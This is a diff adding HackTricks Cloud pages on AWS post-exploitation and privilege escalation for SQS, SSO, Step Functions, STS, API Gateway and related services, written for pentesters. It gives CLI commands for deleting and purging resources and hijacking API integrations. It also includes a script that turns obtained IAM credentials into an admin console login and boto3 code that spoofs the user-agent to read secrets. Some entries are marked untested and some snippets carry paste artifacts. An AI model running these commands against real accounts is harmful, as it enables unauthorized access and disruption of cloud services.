+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## SQS + +For more information check: + +{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %} +[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md) +{% endcontent-ref %} + +### `sqs:SendMessage` , `sqs:SendMessageBatch` + +An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources. + +```bash +aws sqs send-message --queue-url --message-body +aws sqs send-message-batch --queue-url --entries +``` + +**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. + +### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility` + +An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages. + +```bash +aws sqs receive-message --queue-url +aws sqs delete-message --queue-url --receipt-handle +aws sqs change-message-visibility --queue-url --receipt-handle --visibility-timeout +``` + +**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages. + +### `sqs:DeleteQueue` + +An attacker could delete an entire SQS queue, causing message loss and impacting applications relying on the queue. + +```arduino +Copy codeaws sqs delete-queue --queue-url +``` + +**Potential Impact**: Message loss and service disruption for applications using the deleted queue. + +### `sqs:PurgeQueue` + +An attacker could purge all messages from an SQS queue, leading to message loss and potential disruption of applications relying on those messages. + +```arduino +Copy codeaws sqs purge-queue --queue-url +``` + +**Potential Impact**: Message loss and service disruption for applications relying on the purged messages. 
+ +### `sqs:SetQueueAttributes` + +An attacker could modify the attributes of an SQS queue, potentially affecting its performance, security, or availability. + +```arduino +aws sqs set-queue-attributes --queue-url --attributes +``` + +**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability. + +### `sqs:TagQueue` , `sqs:UntagQueue` + +An attacker could add, modify, or remove tags from SQS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. + +```bash +aws sqs tag-queue --queue-url --tags Key=,Value= +aws sqs untag-queue --queue-url --tag-keys +``` + +**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. + +### `sqs:RemovePermission` + +An attacker could revoke permissions for legitimate users or services by removing policies associated with the SQS queue. This could lead to disruptions in the normal functioning of applications that rely on the queue. + +```arduino +arduinoCopy codeaws sqs remove-permission --queue-url --label +``` + +**Potential Impact**: Disruption of normal functioning for applications relying on the queue due to unauthorized removal of permissions. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md new file mode 100644 index 0000000000..ccffb5ede5 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md @@ -0,0 +1,53 @@ +# AWS - SSO & identitystore Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## SSO & identitystore + +For more information check: + +{% content-ref url="../aws-services/aws-iam-enum.md" %} +[aws-iam-enum.md](../aws-services/aws-iam-enum.md) +{% endcontent-ref %} + +### `sso:DeletePermissionSet` | `sso:PutPermissionsBoundaryToPermissionSet` | `sso:DeleteAccountAssignment` + +These permissions can be used to disrupt permissions: + +{% code overflow="wrap" %} +```bash +aws sso-admin delete-permission-set --instance-arn --permission-set-arn + +aws sso-admin put-permissions-boundary-to-permission-set --instance-arn --permission-set-arn --permissions-boundary-policy-arn + +aws sso-admin delete-account-assignment --instance-arn --target-id --target-type --permission-set-arn --principal-type --principal-id +``` +{% endcode %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md new file mode 100644 index 0000000000..67719fd731 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md @@ -0,0 +1,105 @@ +# AWS - Step Functions Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Step Functions + +For more information about this AWS service, check: + +{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %} +[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md) +{% endcontent-ref %} + +### `states:RevealSecrets` + +This permission allows to **reveal secret data inside an execution**. For it, it's needed to set Inspection level to TRACE and the revealSecrets parameter to true. + +
+ +### `states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias` + +An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, result in data loss, and require significant time to recover and restore the affected state machines. In addition, it would allow an attacker to cover the tracks used, disrupt forensic investigations, and potentially cripple operations by removing essential automation processes and state configurations. + +{% hint style="info" %} +* Deleting a state machine you also delete all its associated versions and aliases. +* Deleting a state machine alias you do not delete the state machine versions referecing this alias. +* It is not possible to delete a state machine version currently referenced by one o more aliases. +{% endhint %} + +```bash +# Delete state machine +aws stepfunctions delete-state-machine --state-machine-arn +# Delete state machine version +aws stepfunctions delete-state-machine-version --state-machine-version-arn +# Delete state machine alias +aws stepfunctions delete-state-machine-alias --state-machine-alias-arn +``` + +* **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime. + +### `states:UpdateMapRun` + +An attacker with this permission would be able to manipulate the Map Run failure configuration and parallel setting, being able to increase or decrease the maximum number of child workflow executions allowed, affecting directly and performance of the service. In addition, an attacker could tamper with the tolerated failure percentage and count, being able to decrease this value to 0 so every time an item fails, the whole map run would fail, affecting directly to the state machine execution and potentially disrupting critical workflows. 
+ +{% code overflow="wrap" %} +```bash +aws stepfunctions update-map-run --map-run-arn [--max-concurrency ] [--tolerated-failure-percentage ] [--tolerated-failure-count ] +``` +{% endcode %} + +* **Potential Impact**: Performance degradation, and disruption of critical workflows. + +### `states:StopExecution` + +An attacker with this permission could be able to stop the execution of any state machine, disrupting ongoing workflows and processes. This could lead to incomplete transactions, halted business operations, and potential data corruption. + +{% hint style="warning" %} +This action is not supported by **express state machines**. +{% endhint %} + +{% code overflow="wrap" %} +```bash +aws stepfunctions stop-execution --execution-arn [--error ] [--cause ] +``` +{% endcode %} + +* **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption. + +### `states:TagResource`, `states:UntagResource` + +An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. + +```bash +aws stepfunctions tag-resource --resource-arn --tags Key=,Value= +aws stepfunctions untag-resource --resource-arn --tag-keys +``` + +**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md new file mode 100644 index 0000000000..7a03ece8eb --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md @@ -0,0 +1,136 @@ +# AWS - STS Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## STS + +For more information: + +{% content-ref url="../aws-services/aws-iam-enum.md" %} +[aws-iam-enum.md](../aws-services/aws-iam-enum.md) +{% endcontent-ref %} + +### From IAM Creds to Console + +If you have managed to obtain some IAM credentials you might be interested on **accessing the web console** using the following tools.\ +Note that the the user/role must have the permission **`sts:GetFederationToken`**. + +#### Custom script + +The following script will use the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to login inside the web console: + +{% code overflow="wrap" %} +```bash +# Get federated creds (you must indicate a policy or they won't have any perms) +## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges +## Don't forget to use [--profile ] in the first line if you need to +output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess) + +if [ $? 
-ne 0 ]; then + echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status" + exit $status +fi + +# Parse the output +session_id=$(echo $output | jq -r '.Credentials.AccessKeyId') +session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey') +session_token=$(echo $output | jq -r '.Credentials.SessionToken') + +# Construct the JSON credentials string +json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}") + +# Define the AWS federation endpoint +federation_endpoint="https://signin.aws.amazon.com/federation" + +# Make the HTTP request to get the sign-in token +resp=$(curl -s "$federation_endpoint" \ + --get \ + --data-urlencode "Action=getSigninToken" \ + --data-urlencode "SessionDuration=43200" \ + --data-urlencode "Session=$json_creds" +) +signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri) + + + +# Give the URL to login +echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token" +``` +{% endcode %} + +#### aws\_consoler + +You can **generate a web console link** with [https://github.com/NetSPI/aws\_consoler](https://github.com/NetSPI/aws_consoler). + +```bash +cd /tmp +python3 -m venv env +source ./env/bin/activate +pip install aws-consoler +aws_consoler [params...] #This will generate a link to login into the console +``` + +{% hint style="warning" %} +Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume. +{% endhint %} + +#### aws-vault + +[**aws-vault**](https://github.com/99designs/aws-vault) is a tool to securely store and access AWS credentials in a development environment. 
+ +```bash +aws-vault list +aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds +aws-vault login jonsmith # Open a browser logged as jonsmith +``` + +{% hint style="info" %} +You can also use **aws-vault** to obtain an **browser console session** +{% endhint %} + +### **Bypass User-Agent restrictions from Python** + +If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing: + +{% code overflow="wrap" %} +```bash +# Shared by ex16x41 +# Create a client +session = boto3.Session(profile_name="lab6") +client = session.client("secretsmanager", region_name="us-east-1") + +# Change user agent of the client +client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) ) + +# Perform the action +response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString']) +``` +{% endcode %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md new file mode 100644 index 0000000000..4ca191307f --- /dev/null +++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md @@ -0,0 +1,39 @@ +# AWS - VPN Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## VPN + +For more information: + +{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} +[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/README.md b/pentesting-cloud/aws-security/aws-privilege-escalation/README.md new file mode 100644 index 0000000000..5d96ec8ca1 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/README.md @@ -0,0 +1,51 @@ +# AWS - Privilege Escalation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## AWS Privilege Escalation + +The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other roles/users/groups privileges. Chaining escalations until you have admin access over the organization. + +{% hint style="warning" %} +AWS has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**. +{% endhint %} + +{% hint style="danger" %} +If an IAM policy has `"Effect": "Allow"` and `"NotAction": "Someaction"` indicating a **resource**... that means that the **allowed principal** has **permission to do ANYTHING but that specified action**.\ +So remember that this is another way to **grant privileged permissions** to a principal. +{% endhint %} + +**The pages of this section are ordered by AWS service. In there you will be able to find permissions that will allow you to escalate privileges.** + +## Tools + +* [https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws\_escalate.py](https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py) +* [Pacu](https://github.com/RhinoSecurityLabs/pacu) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md new file mode 100644 index 0000000000..fb13f32767 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md @@ -0,0 +1,142 @@ +# AWS - Apigateway Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Apigateway + +For more information check: + +{% content-ref url="../aws-services/aws-api-gateway-enum.md" %} +[aws-api-gateway-enum.md](../aws-services/aws-api-gateway-enum.md) +{% endcontent-ref %} + +### `apigateway:POST` + +With this permission you can generate API keys of the APIs configured (per region). + +```bash +aws --region apigateway create-api-key +``` + +**Potential Impact:** You cannot privesc with this technique but you might get access to sensitive info. + +### `apigateway:GET` + +With this permission you can get generated API keys of the APIs configured (per region). + +```bash +aws --region apigateway get-api-keys +aws --region apigateway get-api-key --api-key --include-value +``` + +**Potential Impact:** You cannot privesc with this technique but you might get access to sensitive info. + +### `apigateway:UpdateRestApiPolicy`, `apigateway:PATCH` + +With these permissions it's possible to modify the resource policy of an API to give yourself access to call it and abuse potential access the API gateway might have (like invoking a vulnerable lambda). + +{% code overflow="wrap" %} +```bash +aws apigateway update-rest-api \ + --rest-api-id api-id \ + --patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"' +``` +{% endcode %} + +**Potential Impact:** You, usually, won't be able to privesc directly with this technique but you might get access to sensitive info. + +### `apigateway:PutIntegration`, `apigateway:CreateDeployment`, `iam:PassRole` + +{% hint style="info" %} +Need testing +{% endhint %} + +An attacker with the permissions `apigateway:PutIntegration`, `apigateway:CreateDeployment`, and `iam:PassRole` can **add a new integration to an existing API Gateway REST API with a Lambda function that has an IAM role attached**. The attacker can then **trigger the Lambda function to execute arbitrary code and potentially gain access to the resources associated with the IAM role**. 
+ +{% code overflow="wrap" %} +```bash +API_ID="your-api-id" +RESOURCE_ID="your-resource-id" +HTTP_METHOD="GET" +LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name" +LAMBDA_ROLE_ARN="arn:aws:iam::account-id:role/lambda-role" + +# Add a new integration to the API Gateway REST API +aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --type AWS_PROXY --integration-http-method POST --uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations --credentials $LAMBDA_ROLE_ARN + +# Create a deployment for the updated API Gateway REST API +aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod +``` +{% endcode %} + +**Potential Impact**: Access to resources associated with the Lambda function's IAM role. + +### `apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment` + +{% hint style="info" %} +Need testing +{% endhint %} + +An attacker with the permissions `apigateway:UpdateAuthorizer` and `apigateway:CreateDeployment` can **modify an existing API Gateway authorizer** to bypass security checks or to execute arbitrary code when API requests are made. + +{% code overflow="wrap" %} +```bash +API_ID="your-api-id" +AUTHORIZER_ID="your-authorizer-id" +LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name" + +# Update the API Gateway authorizer +aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZER_ID --authorizer-uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations + +# Create a deployment for the updated API Gateway REST API +aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod +``` +{% endcode %} + +**Potential Impact**: Bypassing security checks, unauthorized access to API resources. 
+ +### `apigateway:UpdateVpcLink` + +{% hint style="info" %} +Need testing +{% endhint %} + +An attacker with the permission `apigateway:UpdateVpcLink` can **modify an existing VPC Link to point to a different Network Load Balancer, potentially redirecting private API traffic to unauthorized or malicious resources**. + +```bash +bashCopy codeVPC_LINK_ID="your-vpc-link-id" +NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new-load-balancer-name/50dc6c495c0c9188" + +# Update the VPC Link +aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op=replace,path=/targetArns,value="[$NEW_NLB_ARN]" +``` + +**Potential Impact**: Unauthorized access to private API resources, interception or disruption of API traffic. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md new file mode 100644 index 0000000000..7294ee888a --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md @@ -0,0 +1,35 @@ +# AWS - Chime Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### chime:CreateApiKey + +TODO + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md new file mode 100644 index 0000000000..f810969439 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md @@ -0,0 +1,144 @@ +# AWS - Cloudformation Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
